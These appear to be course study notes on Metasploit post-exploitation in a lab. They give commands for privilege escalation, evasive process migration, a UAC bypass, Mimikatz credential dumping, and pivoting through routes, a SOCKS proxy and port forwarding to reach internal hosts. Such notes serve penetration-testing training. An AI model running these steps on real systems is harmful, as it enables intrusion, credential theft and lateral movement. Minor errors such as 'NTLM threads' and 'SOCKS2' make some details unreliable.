Performing Post-Exploitation with Metasploit

21.3.1 - Core meterpreter post-exploitation with metasploit

Display the time for which a user has been idle. After obtaining basic information about the current user and operating system, this should be one of our first commands as it indicates if the target machine is currently in use or not.

idletime

We can use getsystem in the meterpreter shell to attempt privesc to to NTAUTHORITY/SYSTEM. This requires the initial user to have SeImpersonatePrivilege

getsystem

Another important post-exploitation feature is migrate. When we compromise a host, our Meterpreter payload is executed inside the process of the application we attack or execute our payload. If the victim closes that process, our access to the machine is closed as well. In addition, depending on how the Windows binary file containing the Meterpreter payload is named, the process name may be suspicious if a defender is searching through the process list. We can use migrate to move the execution of our Meterpreter payload to a different process.

ps

migrate 8052

ps

Migrate a newly formed process with no visual representation, using -H. useful if theres not a lot of existing processes to migrate to.

execute -H -f notepad

migrate 2720

21.3.2 - Post-exploitation modules

Review the integrity level of a current process we have migrated to with PowerShell. Will show medium on the example machine.

shell

powershell -ep bypass

Import-Module NtObjectManager

Get-NtTokenIntegrityLevel

Search for and leverage UAC post exploitation modules on another session (bg current one)
Using this one on the example machine. This will upgrade the token integrity level to high instead of medium.

use exploit/windows/local/bypassuac_sdclt

Get-NtTokenIntegrityLevel

Extensions can also be loaded directly inside an active session. An example of this is the kiwi module that provides the capabilities of Mimikatz

load kiwi

Retrieve NTLM threads

creds_msv

21.3.3 - Pivoting with metasploit

Start by checking for dual interfaces in a shell

ipconfig

Then on the meterpreter shell add a route to the internal network

bg

route add 172.16.5.0/24 12

route print

Scan the newly-found machine

use auxiliary/scanner/portscan/tcp

set RHOSTS 172.16.5.200

set PORTS 445,3389

run

It's important to note that the added route will only work with established connections. Because of this, the new shell on the target must be a bind shell thus allowing a set route to connect to it. An example of this is the psexec module (omitting the options you will need to set here)

use exploit/windows/smb/psexec

run

As an alternative to adding routes manually, we can use the autoroute post-exploitation module to set up pivot routes through an existing Meterpreter session automatically.

use multi/manage/autoroute

sessions -l

set session 12

We could now use the psexec module as we did before, but we can also combine routes with the server/socks_proxy auxiliary module to configure a SOCKS2 proxy. This allows applications outside of the Metasploit Framework to tunnel through the pivot on port 1080 by default.

use auxiliary/server/socks_proxy

set SRVHOST 127.0.0.1

set VERSION 5

run -j

Finally, we can run xfreerdp to access the gui after doing this

sudo proxychains xfreerdp /v:172.16.5.200 /u:luiza

We can use a similar port forwarding technique from inside the Meterpreter session. Here we're using local port forwarding.

portfwd -h

portfwd add -l 3389 -p 3389 -r 172.16.5.200

sudo xfreerdp /v:127.0.0.1 /u:luiza